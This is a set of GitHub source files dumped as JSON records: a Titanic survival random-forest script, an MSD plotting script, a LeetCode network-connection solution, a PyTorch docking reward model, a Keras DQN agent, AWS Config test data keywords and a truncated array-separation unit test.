training a model based on training data, mark 'False' for loading a pickle file\nSAVE = True # Mark save is 'True' for pickling the trained model with a timestamp, mark 'False for not saving the model\n\n# Loading data as pandas dataframe:\ndf_train = pd.read_csv('sourceData/train.csv') # Survival provided\ndf_test = pd.read_csv('sourceData/test.csv') # Survival not provided, to predict\ndf_titanic = pd.read_csv('sourceData/titanic.csv') # Full dataset for checking prediction accuracy\ndf_output = df_test[['PassengerId', 'Name']]\n\ndata = [df_train, df_test]\n\n\"\"\"\nA. 
Exploratory Data Analysis:\n\"\"\"\n\n# A.1 Data overview:\ndf_train.describe()\ndf_train.info()\n\ndf_train.drop(labels='PassengerId', axis=1, inplace=True)\ndf_test.drop(labels='PassengerId', axis=1, inplace=True)\n# Conclusions:\n# - 'PassengerId' is a mere row identifier which is dropped from the analysis\n\n# A.2 Missing values\nnull_count_by_column(df_train) # Print features for which values are null\nnull_count_by_column(df_test)\n\n# Conclusions:\n# - For 'Cabin' the majority of data points are missing, hence imputing data would probably not add value\n# - For 'Age' and 'Fare' missing datapoints may be imputed\n# - For 'Embarked' only 2 values are missing which will be dropped\n\ndf_train.dropna(subset=['Embarked'], inplace=True) # Embarked contains only 2 rows with missing values\ndf_test.dropna(subset=['Embarked'], inplace=True)\n\ndf_train = imp_age(df_train) # Impute median age based on Sex/Pclass groups\ndf_test = imp_age(df_test)\n\ndf_train = imp_fare(df_train) # Impute mean fare based on Pclass groups\ndf_test = imp_fare(df_test)\n\n# A.3 Target Distribution\nsurv = sum(df_train['Survived'])\nsurv_women = df_train.loc[df_train.Sex == 'female'][\"Survived\"]\nsurv_men = df_train.loc[df_train.Sex == 'male'][\"Survived\"]\n\nprint(f'{surv} from the {len(df_train)} training observations survived the Titanic, indicating a survival rate of '\n f'{surv / len(df_train):.2%}')\n\n# Conclusions:\n# - The minority of persons in the training set survived the Titanic\n\n# A.4 Feature Target Distribution\nprint(df_train.dtypes)\n\n# A.4.1 Continuous Features\ncol_cont = df_train.select_dtypes(include='float64')\n\nfor col in col_cont:\n q = pd.qcut(df_train[col], 10)\n print(df_train.pivot_table('Survived', index=q))\n\n# Conclusions:\n# - The Distribution of Age indicates that children (<16) have a higher survival rate\n# - The Distribution of Fare indicates that a higher Fare (10.5+) indicates a higher survival rate\n\n# A.4.2 Categorical Features\ncol_cat = df_train.select_dtypes(exclude='float64')\n\nprint(f'{surv} from the {len(df_train)} training observations survived the Titanic, from which {sum(surv_women)}'\n f' are female ({sum(surv_women) / surv:.2%}), and {sum(surv_men)} are male ({sum(surv_men) / surv:.2%})')\nprint(\n f'From the total number of woman {sum(surv_women) / len(surv_women):.2%} survived, and from the total number of men'\n f' {sum(surv_men) / len(surv_men):.2%} survived the Titanic')\n\npivot_cat(df_train, col_cat) # print the survival rate per categorical feature category\n\n# Conclusions:\n# - Female passengers have a higher survival rate than male\n# - Passengers embarked from Cherbourg (C) have the highest survival rate\n# - Passengers travelling with Parents or Children have a higher survival rate\n# - Passengers travelling class 1 or 2 have a higher survival rate than passengers travelling class 3\n# - Passengers travelling with a Sibling or Spouse have a higher survival rate\n\n# A.5 Correlation\nprint(f'Correlation Matrix: \\n {df_train.corr().round(2)}')\n\n# Conclusions:\n# - Feature correlation indicates relationships which may be used for creating new features\n# - Spikes in a distribution (f.i. 'Age') may be captured via a decision tree model\n# - Ordinal relations (f.i. 'Pclass) may be captured via a linear model\n\n# A.6 EDA Plots\nif PLOT:\n plot_hist(df_train, col_cont) # Plot A.4.1 Continuous Features\n plot_count(df_train, col_cat) # Plot A.4.2 Categorical Features\n plot_corr(df_train) # Plot A.5 Correlation\n\n\"\"\"\nB. 
Feature Engineering:\n\"\"\"\n\n# B.1. New features\n\n# B.1.1 Creating new features from arithmetics\ndf_train['Family_Size'] = 1 + df_train['SibSp'] + df_train['Parch']\ndf_test['Family_Size'] = 1 + df_test['SibSp'] + df_test['Parch']\n\ndf_train['Cabin_n'] = df_train.Cabin.apply(lambda x: 0 if pd.isna(x) else len(x.split(' '))) # Count Cabins, 0 is NaN\ndf_test['Cabin_n'] = df_test.Cabin.apply(lambda x: 0 if pd.isna(x) else len(x.split(' ')))\n\ndf_train['Cabin_section'] = df_train.Cabin.apply(lambda x: str(x)[0]) # Retrieve section, first Cabin character\ndf_test['Cabin_section'] = df_test.Cabin.apply(lambda x: str(x)[0])\n\ndf_train['Name_title'] = df_train.Name.apply(\n lambda x: x.split(',')[1].split('.')[0].strip()) # Retrieve title from Name\ndf_test['Name_title'] = df_test.Name.apply(lambda x: x.split(',')[1].split('.')[0].strip())\n\ndf_train['freq_Ticket'] = df_train.groupby('Ticket')['Ticket'].transform('count') # Indicates n people travelling\n# with the same ticket\ndf_test['freq_Ticket'] = df_test.groupby('Ticket')['Ticket'].transform('count')\n\n# B.1.2 Creating new features from Binning Continuous features\ndf_train['bin_Fare'] = pd.qcut(df_train['Fare'], 15)\ndf_test['bin_Fare'] = pd.qcut(df_test['Fare'], 15)\n\ndf_train['bin_Age'] = pd.qcut(df_train['Age'], 10)\ndf_test['bin_Age'] = pd.qcut(df_test['Age'], 10)\n\n# B.3 Binary Encoding\ndf_train['bin_Sex'] = df_train.Sex.map({'male': 0, 'female': 1}) # Map binary 'Sex'\ndf_test['bin_Sex'] = df_test.Sex.map({'male': 0, 'female': 1})\n\n# B.4 Frequency Encoding\nencoding = {1: 'Alone', 2: 'Small', 3: 'Small', 4: 'Small', 5: 'Large', 6: 'Large', 7: 'Large', 8: 'Large',\n 9: 'Large', 10: 'Large', 11: 'Large', 12: 'Large'} # Based on Countplot families of 2-4 persons are 'Small'\ndf_train[f'ord_Family_Size'] = df_train['Family_Size'].map(encoding)\ndf_test[f'ord_Family_Size'] = df_test['Family_Size'].map(encoding)\n\n# B.5 Label Encoding\ncol_label = ['Embarked', 'bin_Fare', 'bin_Age', 'Cabin_section', 'Name_title', 'ord_Family_Size']\ndf_train = enc_label(df_train, col_label)\ndf_test = enc_label(df_test, col_label)\n\n# B.6 1-Hot Encoding\ndf_train = enc_1hot(df_train, 'Embarked') # one-hot encode categorical feature 'Embarked'\ndf_test = enc_1hot(df_test, 'Embarked')\n\n# B.X Feature Engineering plots\nif PLOT:\n plot_count(df_train, ['Family_Size']) # Plot B.1.1 Creating new features from arithmetics\n plot_count(df_train, ['Cabin_n']) # Plot B.1.1 Creating new features from arithmetics\n plot_count(df_train, ['Cabin_section']) # Plot B.1.1 Creating new features from arithmetics\n plot_count(df_train, ['Name_title']) # Plot B.1.1 Creating new features from arithmetics\n plot_count(df_train, ['bin_Fare']) # Plot B.1.2 Creating new features from Binning Continuous features\n plot_count(df_train, ['bin_Age']) # Plot B.1.2 Creating new features from Binning Continuous features\n\n# Plotting the data\n# plot_corr(df_train, col_num) # Plot Correlation Heatmap for numerical features\n# plot_mi_scores(mi_scores.head(20)) # Plot MI scores for numerical features\n\n\"\"\"\nC. 
Model:\n\"\"\"\n\n# C.1 Model Data selection\ny = df_train['Survived']\n\nfeature_scope = df_test.select_dtypes(include=['float64', 'int64', 'int32', 'uint8']).columns\nX = df_train[feature_scope]\nX_test = df_test[feature_scope] # Source data for predicting Titanic survivors\n\nX_train, X_valid, y_train, y_valid = train_test_split(X, y, random_state=SEED) # Setup train/test data\n\n\"\"\"\"\nThe steps to building and using a model are:\n\nSpecify: Define the type of model that will be used, and the parameters of the model.\nFit: Capture patterns from provided data. This is the heart of modeling.\nPredict: Predict the values for the prediction target (y)\nEvaluate: Determine how accurate the model's predictions are.\n\"\"\"\n\n# C.2 Model specification\ndir_model = 'modelsTrained/'\n\nif TRAIN:\n\n # C.2.1 Random Forest Classifier\n model_Forest = RandomForestClassifier(max_depth=5, min_samples_split=4, min_samples_leaf=5, max_features='auto',\n random_state=SEED)\n\n # C.2.2 Model Selection\n model = model_Forest\n\n # C.2.3 Model Training\n model.fit(X_train, y_train)\n\nelse:\n filename_model = 'trained_modelForest.sav'\n filepath_model = os.path.join(dir_model, filename)\n model = pickle.load(open(filepath_model, 'rb'))\n print(f'Loading pickled model: {filepath_model}')\n\npredictions_train = model.predict(X_valid)\n\n# C.3 Model Evaluation (metrics)\nrmse = mean_squared_error(y_true=y_valid, y_pred=predictions_train, squared=False)\nprint(f'Competition score metric! Root Mean Squared Error: {rmse:.4f}') # Best possible score is: 0.0000\nmae = mean_absolute_error(y_true=y_valid, y_pred=predictions_train)\nprint(f'Mean Absolute Error: {mae:.4f}') # Best possible score is: 0.0000\nmse = mean_squared_error(y_true=y_valid, y_pred=predictions_train, squared=True)\nprint(f'Mean Squared Error: {mse:.4f}') # Best possible score is: 0.0000\nmape = mean_absolute_percentage_error(y_true=y_valid, y_pred=predictions_train)\nprint(f'Mean Absolute Percentage Error: {mape:.2%}') # Best possible score is: 0.00%\nevs = explained_variance_score(y_true=y_valid, y_pred=predictions_train)\nprint(f'Explained Variance Score: {evs:.2f}') # Best possible score is: 1.00\n\n# Save model to disk (pickle model)\ntimestamp = f'{datetime.datetime.now():%d%m%y_%H%M}'\n\nif SAVE:\n filename_model = f'trained_modelForest_{timestamp}.sav'\n filepath_model = os.path.join(dir_model, filename_model)\n pickle.dump(model, open(filepath_model, 'wb'))\n print(f'Saved pickled model: {filepath_model}')\n\n# D. 
Output\npredictions = model.predict(X_test)\noutput = pd.DataFrame({'PassengerId': df_output.PassengerId, 'Survived': predictions})\n\ndir_output = 'outputData/'\nfilename_output = f'survivor_estimation_{timestamp}.csv'\nfilepath_output = os.path.join(dir_output, filename_output)\noutput.to_csv(filepath_output, index=False)\nprint(f'The survivor estimation of the test data was saved to {filepath_output}')\n\n\"\"\"\n# Compare the survivor estimation against actual survivor observations\ndf = pd.merge(df_test[['Name', 'PassengerId']], df_titanic[['name', 'survived']], left_on='Name', right_on='name',\n how='left') \\\n .drop_duplicates(subset='PassengerId')\ndf2 = pd.merge(output.set_index('PassengerId'), df.set_index('PassengerId'), left_index=True, right_index=True,\n how='left')\n\ndf2['correct'] = df2['Survived'] == df2['survived']\n\n# Calculate success rate of random forest survival estimation\nsuccess_rate = sum(df2['correct']) / len(df2['correct'])\nprint(f'The random forest predicted {success_rate:.2%} survivors correctly!')\n\"\"\"","repo_name":"ysuurme/kaggle_Titanic","sub_path":"titanic.py","file_name":"titanic.py","file_ext":"py","file_size_in_byte":11409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1231569179","text":"import h5py\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n#plot mean square displacement over time\n\n#load ana data\nwith h5py.File(f'coord_ana.h5', 'r') as f:\n MSD=np.array(f['MSD'])\n delta_mc_MSD=np.array([f['MSD'].attrs[\"DeltaMC\"]])\n \nMSDA=MSD[:,3]\nt_end=len(MSDA)*delta_mc_MSD\nt=np.arange(0,t_end,delta_mc_MSD)\nplt.plot(t,MSDA)\nplt.show()\n","repo_name":"justusm00/soma_mod","sub_path":"python_routines/plot_MSD.py","file_name":"plot_MSD.py","file_ext":"py","file_size_in_byte":355,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"8126146921","text":"# There are n computers numbered \n# from 0 to n - 1 connected by ethernet cables connections forming a network where connections[i] = [ai, bi] represents a connection between computers ai and bi. Any computer can reach any other computer directly or indirectly through the network.\n\n# You are given an initial computer network connections. \n# You can extract certain cables between two directly connected computers, and place them between any pair of disconnected computers to make them directly connected.\n\n# Return the minimum number of times you need to do this \n# in order to make all the computers connected. 
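(Illustration added here, not part of the original problem text: with n = 4 and connections = [[0,1],[0,2],[1,2]], computers 0-2 form one component with one redundant cable, so moving that cable to computer 3 connects everything in 1 operation; whenever len(connections) >= n - 1, the answer is the number of connected components minus 1.) 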
If it is not possible, return -1.\n\n\nfrom collections import defaultdict\n\n\nclass Solution(object):\n def makeConnected(self, n, connections):\n \"\"\"\n :type n: int\n :type connections: List[List[int]]\n :rtype: int\n \"\"\"\n if len(connections) < n - 1:\n return -1\n graph = defaultdict(set)\n for u, v in connections:\n graph[u].add(v)\n graph[v].add(u)\n \n visited = set()\n \n def dfs(node):\n if node in visited:\n return 0\n visited.add(node)\n for adj in graph[node]:\n dfs(adj)\n return 1\n \n \n # number of DSUs - 1\n return sum(dfs(node) for node in range(n)) - 1\n \n \n\n\nif __name__ == \"__main__\":\n s = Solution()\n n = 4\n connections = [[0,1],[0,2],[1,2]]\n s.makeConnected(n, connections)","repo_name":"YingbingZhu/python_leetcode","sub_path":"graph/1319.Number of Operations to Make Network Connected.py","file_name":"1319.Number of Operations to Make Network Connected.py","file_ext":"py","file_size_in_byte":1540,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"36014154334","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom e3nn import o3\nfrom torch_scatter import scatter, scatter_mean, scatter_add\nfrom torch_cluster import radius, radius_graph\n\nfrom dockgame.utils.geometry import apply_rigid_transform\nfrom dockgame.common.constants import DEVICE\n\nfrom dockgame.models.dock_reward import (\n sample_rigid_body_transform, get_activation_layer,\n TensorProductConvLayer, GaussianSmearing\n)\n\n\nclass RewardModelHetero(nn.Module):\n\n def __init__(self,\n node_fdim: int,\n edge_fdim: int,\n sh_lmax: int = 2,\n n_s: int = 16,\n n_v: int = 4,\n n_conv_layers: int = 2,\n max_radius: float = 10.0,\n cross_max_radius: float = 10.0,\n distance_emb_dim: int = 32,\n cross_dist_emb_dim: int = 32,\n dropout_p: float = 0.1,\n activation: str = \"relu\", \n enforce_stability=False, n_deviations: int = 0, \n deviation_eps: float = 0.01,**kwargs\n ):\n \n super().__init__(**kwargs)\n\n self.node_fdim = node_fdim\n self.edge_fdim = edge_fdim\n self.sh_irreps = o3.Irreps.spherical_harmonics(lmax=sh_lmax)\n self.n_s, self.n_v = n_s, n_v\n self.n_conv_layers = n_conv_layers\n\n self.max_radius = max_radius\n self.cross_max_radius = cross_max_radius\n self.enforce_stability = enforce_stability\n\n self.n_deviations = n_deviations\n self.deviation_eps = deviation_eps\n \n irrep_seq = [\n f\"{n_s}x0e\",\n f\"{n_s}x0e + {n_v}x1o\",\n f\"{n_s}x0e + {n_v}x1o + {n_v}x1e\",\n f\"{n_s}x0e + {n_v}x1o + {n_v}x1e + {n_s}x0o\"\n ]\n\n act_layer = get_activation_layer(activation)\n\n self.node_embedding = nn.Sequential(\n nn.Linear(node_fdim, n_s),\n act_layer,\n nn.Dropout(dropout_p) if dropout_p else nn.Identity(),\n nn.Linear(n_s, n_s)\n )\n\n if cross_dist_emb_dim is None:\n cross_dist_emb_dim = distance_emb_dim\n\n self.edge_embedding = nn.Sequential(\n nn.Linear(edge_fdim + distance_emb_dim, n_s),\n act_layer,\n nn.Dropout(dropout_p) if dropout_p else nn.Identity(),\n nn.Linear(n_s, n_s)\n )\n\n self.cross_edge_embedding = nn.Sequential(\n nn.Linear(edge_fdim + cross_dist_emb_dim, n_s),\n act_layer,\n nn.Dropout(dropout_p) if dropout_p else nn.Identity(),\n nn.Linear(n_s, n_s)\n )\n\n self.dist_expansion = GaussianSmearing(\n start=0.0, stop=max_radius, \n num_gaussians=distance_emb_dim\n )\n self.cross_dist_expansion = GaussianSmearing(\n start=0.0, stop=cross_max_radius, \n num_gaussians=cross_dist_emb_dim\n )\n\n conv_layers, cross_conv_layers = [], []\n\n for i in range(n_conv_layers):\n in_irreps 
= irrep_seq[min(i, len(irrep_seq)-1)]\n out_irreps = irrep_seq[min(i+1, len(irrep_seq)-1)]\n\n parameters = {\n \"in_irreps\": in_irreps,\n \"sh_irreps\": self.sh_irreps,\n \"out_irreps\": out_irreps,\n \"edge_fdim\": 3 * n_s,\n \"h_dim\": 3 * n_s,\n \"residual\": False,\n \"dropout\": dropout_p,\n }\n\n conv_layer = TensorProductConvLayer(**parameters)\n cross_conv_layer = TensorProductConvLayer(**parameters)\n\n conv_layers.append(conv_layer)\n cross_conv_layers.append(cross_conv_layer)\n\n self.conv_layers = nn.ModuleList(conv_layers)\n self.cross_conv_layers = nn.ModuleList(cross_conv_layers)\n\n self.energy_predictor_edges = nn.Sequential(\n #nn.Linear(4* self.n_s + distance_emb_dim if n_conv_layers >= 3 else 2 * self.n_s + distance_emb_dim, self.n_s),\n nn.Linear(5 * self.n_s if n_conv_layers >= 3 else 3 * self.n_s, self.n_s),\n act_layer,\n nn.Dropout(dropout_p),\n nn.Linear(self.n_s, self.n_s),\n act_layer,\n nn.Dropout(dropout_p),\n nn.Linear(self.n_s, 1),\n )\n\n self.energy_predictor_nodes = nn.Sequential(\n nn.Linear(2 * self.n_s if n_conv_layers >= 3 else self.n_s, 2 * self.n_s),\n act_layer,\n nn.Dropout(dropout_p),\n nn.Linear(2 * self.n_s, self.n_s),\n act_layer,\n nn.Dropout(dropout_p),\n nn.Linear(self.n_s, 1),\n )\n\n def forward(self, data):\n graph = self.setup_graph(data, pos_to_use=\"current\")\n graph_ref = self.setup_graph(data, pos_to_use=\"ref\")\n\n cross_graph = self.setup_cross_graph(data, pos_to_use=\"current\")\n cross_graph_ref = self.setup_cross_graph(data, pos_to_use=\"ref\")\n\n energy = self.compute_energy(graph, cross_graph, data.batch)\n energy_ref = self.compute_energy(graph_ref, cross_graph_ref, data.batch)\n energy_diff = energy - energy_ref\n\n energy_deviations = None\n energy_bound = None\n\n return (energy, energy_ref, energy_diff), (energy_deviations, energy_bound)\n\n def compute_energy(self, graph, cross_graph, batch):\n x, edge_index, edge_attr, edge_sh = graph\n\n src, dst = edge_index\n x = self.node_embedding(x)\n edge_attr = self.edge_embedding(edge_attr)\n\n cross_edge_index, cross_edge_attr, cross_edge_sh = cross_graph\n cross_src, cross_dst = cross_edge_index\n cross_edge_attr = self.cross_edge_embedding(cross_edge_attr)\n\n for i in range(self.n_conv_layers):\n edge_attr_ = torch.cat([edge_attr, x[src, :self.n_s], x[dst, :self.n_s]], dim=-1)\n x_intra_update = self.conv_layers[i](x, edge_index, edge_attr_, edge_sh)\n\n cross_edge_attr_ = torch.cat([cross_edge_attr, x[cross_src, :self.n_s], x[cross_dst, :self.n_s]], dim=-1)\n x_inter_update = self.cross_conv_layers[i](x, cross_edge_index, cross_edge_attr_, cross_edge_sh)\n\n x = F.pad(x, (0, x_intra_update.shape[-1] - x.shape[-1]))\n x = x + x_intra_update + x_inter_update\n\n x_src = torch.cat([x[src,:self.n_s], x[src,-self.n_s:]], dim=1) \\\n if self.n_conv_layers >= 3 else x[src,:self.n_s] # (n_edges, emb_dim)\n x_dst = torch.cat([x[dst,:self.n_s], x[dst,-self.n_s:]], dim=1) \\\n if self.n_conv_layers >= 3 else x[dst,:self.n_s]\n x_feats = torch.cat([x_src, x_dst], dim=-1)\n\n energy_inputs_edges = torch.cat([edge_attr, x_feats], dim=-1)\n energy_inputs_nodes = torch.cat([x[:, :self.n_s], x[:, -self.n_s:]], dim=1) \\\n if self.n_conv_layers >= 3 else x[:, :self.n_s]\n \n energy_nodes = self.energy_predictor_nodes(energy_inputs_nodes) \n energy_edges = self.energy_predictor_edges(energy_inputs_edges)\n\n edge_batch = batch[src]\n\n energy_nodes_agg = scatter_mean(energy_nodes, index=batch, dim=0)\n energy_edges_agg = scatter_mean(energy_edges, index=edge_batch, dim=0)\n \n energy = 
energy_edges_agg + energy_nodes_agg\n return energy\n \n def predict(self, data):\n graph = self.setup_graph(data=data, pos_to_use=\"current\")\n cross_graph = self.setup_cross_graph(data=data, pos_to_use='current')\n energy = self.compute_energy(graph, cross_graph, data.batch)\n return energy\n\n def setup_graph(self, data, pos_to_use: str = 'current'):\n if pos_to_use == 'current':\n pos = data.pos\n elif pos_to_use == 'ref':\n pos = data.pos_ref\n\n edge_index = data.edge_index\n src, dst = edge_index\n edge_vec = pos[src.long()] - pos[dst.long()]\n\n edge_length_emb = self.dist_expansion(edge_vec.norm(dim=-1))\n edge_sh = o3.spherical_harmonics(self.sh_irreps, edge_vec, normalization='component', normalize=True)\n\n return data.x, edge_index, edge_length_emb, edge_sh\n \n def setup_cross_graph(self, data, pos_to_use: str = 'current'):\n\n if pos_to_use == \"current\":\n pos = data.pos\n cross_edge_index = data.cross_edge_index\n\n elif pos_to_use == \"ref\":\n pos = data.pos_ref\n cross_edge_index = data.ref_cross_edge_index\n\n cross_src, cross_dst = cross_edge_index\n edge_vec = pos[cross_src.long()] - pos[cross_dst.long()]\n\n edge_length_emb = self.cross_dist_expansion(edge_vec.norm(dim=-1))\n cross_edge_sh = o3.spherical_harmonics(\n self.sh_irreps, edge_vec, normalization='component', normalize=True)\n\n return cross_edge_index, edge_length_emb, cross_edge_sh\n","repo_name":"vsomnath/dockgame","sub_path":"dockgame/models/dock_reward_hetero.py","file_name":"dock_reward_hetero.py","file_ext":"py","file_size_in_byte":9094,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"48"} +{"seq_id":"32179510830","text":"import gym\nimport math, random\nimport numpy as np\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras.optimizers import Adam\nfrom collections import deque\n\n# maximum steps per episode\nMAX_STEPS_EPI = 1000\n\nclass DQNController():\n\n def __init__(self, env, learning=False, testing=False, learning_rate=0.001, alpha=0.5, epsilon=0.5, \n epsilon_thr=0.05, gamma=0.99, experience_size=3000, batch_size=16 ):\n\n self.done = False\n self.countSteps = 0\n self.nEpisodes = 0\n\n # valid actions\n self.valid_actions = [0, 1]\n\n '''\n Parameters of the agent\n '''\n self.env = env\n self.learning = learning\n self.testing = testing\n\n # learning rates\n self.learning_rate = learning_rate\n self.alpha = alpha\n\n # exploration-explotation\n self.epsilon = epsilon\n self.epsilon_thr = epsilon_thr\n\n # discount\n self.gamma = gamma\n\n # list to store the agent's experience\n self.experience = deque(maxlen=experience_size)\n self.batch_size = batch_size\n\n\n\n self.state_size = env.observation_space.shape[0]\n self.action_size = env.action_space.n\n\n # build neural network model\n self.model = self.define_nn()\n\n\n '''\n Defines Neural Network arquitecture for Deep Q Learning\n '''\n def define_nn(self):\n model = Sequential()\n model.add(Dense(32, input_dim=self.state_size, activation='relu'))\n model.add(Dense(32, activation='relu'))\n model.add(Dense(self.action_size, activation='linear'))\n model.compile(loss='mse',\n optimizer=Adam(lr=self.learning_rate))\n return model\n\n def store(self, state, action, reward, state_previous, done):\n self.experience.append((state, action, reward, state_previous, done))\n\n '''\n - Resets the value of the environment to run a new episode\n - Updates the exploration-explotation rate\n '''\n def reset(self):\n self.env.reset()\n self.countSteps = 0\n self.nEpisodes += 
1\n        self.done = False\n\n        # choose epsilon decay function\n        decayF = 1\n\n        if self.epsilon < self.epsilon_thr:\n            # guarantee some exploration\n            self.epsilon = self.epsilon_thr\n\n        # decay epsilon each episode\n        elif decayF == 0:\n            # linear decay\n            self.epsilon -= 0.05\n\n        elif decayF == 1:\n            # exponential decay\n            aDecay = 0.8\n            self.epsilon = aDecay ** self.nEpisodes\n\n        elif decayF == 2:\n            # quadratic inverse\n            if self.nEpisodes == 0:\n                self.epsilon = 1\n            else:\n                self.epsilon = self.nEpisodes ** (-2)\n\n        elif decayF == 3:\n            # exponential decay 2\n            aDecay = 0.9\n            self.epsilon = math.exp(-aDecay * self.nEpisodes)\n\n        elif decayF == 4:\n            aDecay = 0.1\n            self.epsilon = math.cos(aDecay * self.nEpisodes)\n\n        print(\"Epsilon: %f\" % self.epsilon)\n\n\n    '''\n    Save and Load parameters for the neural network\n    '''\n    def load_model(self, filename):\n        self.model.load_weights(filename)\n\n    def save_model(self, filename):\n        self.model.save_weights(filename)\n\n    '''\n    Chooses the action the agent will carry out\n    '''\n    def choose_action(self):\n\n        if self.learning == False:\n            # random action\n            return random.choice(self.valid_actions)\n\n        # sample exploration-exploitation distribution; also fall back to a\n        # random action on the very first step, before any state is available\n        sampleEE = random.random()\n        if sampleEE <= self.epsilon or not hasattr(self, 'state'):\n            # random action\n            return random.choice(self.valid_actions)\n\n        # action based on highest Q-value\n        action_val = self.model.predict(self.state)\n        print(action_val)\n        return np.argmax(action_val[0])\n
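\n    # Note on the policy above: with probability epsilon the agent explores\n    # (random action), otherwise it exploits the network's Q-values. With the\n    # default schedule (decayF == 1, aDecay = 0.8) epsilon decays per episode\n    # as 1.0, 0.8, 0.64, 0.512, ... until it is clamped at epsilon_thr.\n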
\n    '''\n    Updates the neural network coefficients using minibatches\n    '''\n    def learn(self):\n        if self.learning == True:\n            if len(self.experience) <= self.batch_size:\n                minibatch = random.sample(self.experience, len(self.experience))\n            else:\n                minibatch = random.sample(self.experience, self.batch_size)\n\n            for state, action, reward, state_previous, done in minibatch:\n                target = reward\n                if not done:  # bootstrap from the next state only for non-terminal transitions\n                    target = (reward + self.gamma *\n                              np.amax(self.model.predict(state)[0]))\n                target_f = self.model.predict(state_previous)\n                target_f[0][action] = target\n                self.model.fit(state_previous, target_f, epochs=1, verbose=0)\n\n    def step(self):\n        self.countSteps += 1\n        # calculate action\n        self.action = self.choose_action()\n\n        # apply action and get feedback from environment\n        self.state, self.reward, self.done, _ = self.env.step(self.action)\n\n        # reshape state for input in NN\n        self.state = np.reshape(self.state, [1, self.state_size])\n\n        # highly penalize failing (episode terminated before reaching the step limit)\n        if self.done and self.countSteps < MAX_STEPS_EPI:\n            self.reward = -10.0\n\n        # highly reward not having failed in MAX_STEPS_EPI steps\n        if self.countSteps >= MAX_STEPS_EPI:\n            self.reward = 10.0\n\n        # store history for future replay\n        if self.countSteps != 1:\n            self.store(self.state, self.action, self.reward, self.state_previous, self.done)\n\n        # learn\n        self.learn()\n\n        # update previous state\n        self.state_previous = self.state\n    '''\n    Runs an episode on the Environment\n    '''\n    def run(self):\n\n        while not self.done and self.countSteps < MAX_STEPS_EPI:\n            print(\" Step: %d\" % self.countSteps)\n            if self.testing == True:\n                self.env.render()\n\n            # perform another simulation step\n            self.step()","repo_name":"AlbertoCastelo/Deep-Q-Learning-for-OpenAI","sub_path":"DQNController.py","file_name":"DQNController.py","file_ext":"py","file_size_in_byte":5964,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"5798739951","text":"# -------------------------------------------------------\r\n# TECHNOGIX\r\n# -------------------------------------------------------\r\n# Copyright (c) [2022] Technogix SARL\r\n# All rights reserved\r\n# -------------------------------------------------------\r\n# Keywords to create data for module test\r\n# -------------------------------------------------------\r\n# Nadège LEMPERIERE, @13 november 2021\r\n# Latest revision: 13 november 2021\r\n# -------------------------------------------------------\r\n\r\n# System includes\r\nfrom json import load, dumps\r\n\r\n# Robotframework includes\r\nfrom robot.libraries.BuiltIn import BuiltIn, _Misc\r\nfrom robot.api import logger as logger\r\nfrom robot.api.deco import keyword\r\nROBOT = False\r\n\r\n# ip address manipulation\r\nfrom ipaddress import IPv4Network\r\n\r\n@keyword('Load Standard Test Data')\r\ndef load_standard_test_data(bucket, loggroup, config, account, region) :\r\n\r\n    result = {}\r\n    result['config'] = []\r\n\r\n    result['config'].append({})\r\n    result['config'][0]['name'] = 'config'\r\n    result['config'][0]['data'] = {}\r\n\r\n    result['config'][0]['data']['roleARN'] = loggroup['role']\r\n    result['config'][0]['data']['recordingGroup'] = {\r\n        'allSupported' : True\r\n    }\r\n    # result['config'][0]['data']['Status'] = True\r\n    # status takes a while to switch to true\r\n\r\n    result['rule'] = []\r\n\r\n    result['rule'].append({})\r\n    result['rule'][0]['name'] = 'rule'\r\n    result['rule'][0]['data'] = {}\r\n\r\n    result['rule'][0]['data']['Source'] = {}\r\n    result['rule'][0]['data']['Source']['Owner'] = 'AWS'\r\n    result['rule'][0]['data']['Source']['SourceIdentifier'] = 'EIP_ATTACHED'\r\n    result['rule'][0]['data']['ConfigRuleState'] = 'ACTIVE'\r\n    result['rule'][0]['data']['Scope'] = {}\r\n    result['rule'][0]['data']['Scope']['ComplianceResourceTypes'] = ['AWS::EC2::EIP']\r\n\r\n    logger.debug(dumps(result))\r\n\r\n    return result\r\n","repo_name":"technogix-terraform/module-aws-config","sub_path":"test/keywords/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":1916,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"1722214487","text":"import unittest\n\n__author__ = 'ptoth'\n\n\nclass FindSeparationTests(unittest.TestCase):\n\n    def test_arr1(self):\n        arr = [1, 1, -1, -1]\n        self.assertTupleEqual(self.get_separation_with_minimal_error(arr), (1, 4, 0))\n\n    def test_arr2(self):\n        arr = [-1, 1, 1, 1]\n        self.assertTupleEqual(self.get_separation_with_minimal_error(arr), (0, 4, 0))\n\n    def test_arr3(self):\n        arr = [1, -1, 1, -1, -1]\n        self.assertTupleEqual(self.get_separation_with_minimal_error(arr), (0, 4, 1))\n\n    def test_arr4(self):\n        arr = [1, 1, 1, -1, -1, -1, 1, 1, 1, -1, -1, -1]\n        self.assertTupleEqual(self.get_separation_with_minimal_error(arr), (2, 9, 3))\n\n    def get_separation_with_minimal_error(self, array):\n\n        ones = 0\n        minus_ones = 0\n\n        # determine total number of 1's and -1's\n        for idx, el in enumerate(array):\n            if el == 1:\n                ones += 1\n            else:\n                minus_ones += 1\n
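\n        # e.g. for [1, 1, -1, -1] the best cut is after index 1: every element\n        # then lies on its majority side, giving sep_error = 4 and error = 0,\n        # exactly what test_arr1 above asserts.\n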
